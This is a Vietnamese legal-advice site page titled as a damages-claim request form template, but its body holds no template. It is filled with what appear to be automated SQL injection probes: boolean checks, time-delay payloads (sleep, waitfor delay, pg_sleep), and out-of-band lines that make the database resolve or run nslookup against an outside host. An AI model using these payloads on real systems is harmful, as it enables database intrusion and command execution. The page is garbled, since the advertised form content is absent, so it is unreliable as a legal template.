Bạn cần tư vấn Pháp luật?
Hãy gọi : 1900 6188
"Tổng đài tư vấn pháp luật 1900 6188" là dịch vụ tư vấn luật qua điện thoại của Công ty Luật VinaBiz
  • Tư vấn trực tuyến miễn phí
  • Đội ngũ Luật sư uy tín
  • Tư vấn 24/7
Luật sư tư vấn pháp luật online miễn phí đầu số 1900 6188

Mẫu đơn yêu cầu bồi thường thiệt hại

Cập nhật lần cuối lúc 17:16 ngày 12/08/2013

Nguồn: vinalaf.com.vn
1
1
1
1
1'"
-1 OR 2+100-100-1=0+0+0+1 --
\
1
-1 OR 3+100-100-1=0+0+0+1 --
@@T0j1w
JyI=
-1 OR 3*2<(0+5+100-100) --
-1 OR 3*2>(0+5+100-100) --
-1 OR 2+764-764-1=0+0+0+1
-1 OR 3+764-764-1=0+0+0+1
-1 OR 3*2<(0+5+764-764)
-1 OR 3*2>(0+5+764-764)
-1' OR 2+954-954-1=0+0+0+1 --
-1' OR 3+954-954-1=0+0+0+1 --
-1' OR 3*2<(0+5+954-954) --
-1' OR 3*2>(0+5+954-954) --
-1' OR 2+501-501-1=0+0+0+1 or '5mO7MEGu'='
-1' OR 3+501-501-1=0+0+0+1 or '5mO7MEGu'='
-1' OR 3*2<(0+5+501-501) or '5mO7MEGu'='
-1' OR 3*2>(0+5+501-501) or '5mO7MEGu'='
-1" OR 2+814-814-1=0+0+0+1 --
-1" OR 3+814-814-1=0+0+0+1 --
-1" OR 3*2<(0+5+814-814) --
-1" OR 3*2>(0+5+814-814) --
if(now()=sysdate(),sleep(16.734),0)/*'XOR(if(now()=sysdate(),sleep(16.734),0))OR'"XOR(if(now()=sysdate(),sleep(16.734),0))OR"*/
(select(0)from(select(sleep(16.734)))v)/*'+(select(0)from(select(sleep(16.734)))v)+'"+(select(0)from(select(sleep(16.734)))v)+"*/
-1; waitfor delay '0:0:5.578' --
-1); waitfor delay '0:0:5.578' --
1 waitfor delay '0:0:5.578' --
NeJv2l2d'; waitfor delay '0:0:5.578' --
-1;select pg_sleep(11.156); --
-1);select pg_sleep(11.156); --
-1));select pg_sleep(16.734); --
zt2UHjht';select pg_sleep(16.734); --
t6fT8SoJ');select pg_sleep(5.578); --
gHBe4F8r');select pg_sleep(0); --
p1La8UsT');select pg_sleep(11.156); --
DIj0j4tT'));select pg_sleep(11.156); --
1||UTL_INADDR.get_host_address('dns.'||'sqli.027931.34060-6067.34060.e2c29.1.bxss'||'.me')
'||UTL_INADDR.get_host_address('dns.'||'sqli.027931.34060-6068.34060.e2c29.1.bxss'||'.me')||'
1;copy (select '') to program 'nslookup dns.sqli.\027931.34060-6069.34060.e2c29.\1.bxss.me'
1';copy (select '') to program 'nslookup dns.sqli.\027931.34060-6072.34060.e2c29.\1.bxss.me
639'

Tư vấn pháp luật online miễn phí đầu số 1900 6188

Đặt câu hỏi

Họ tên:
Email:
Tiêu đề: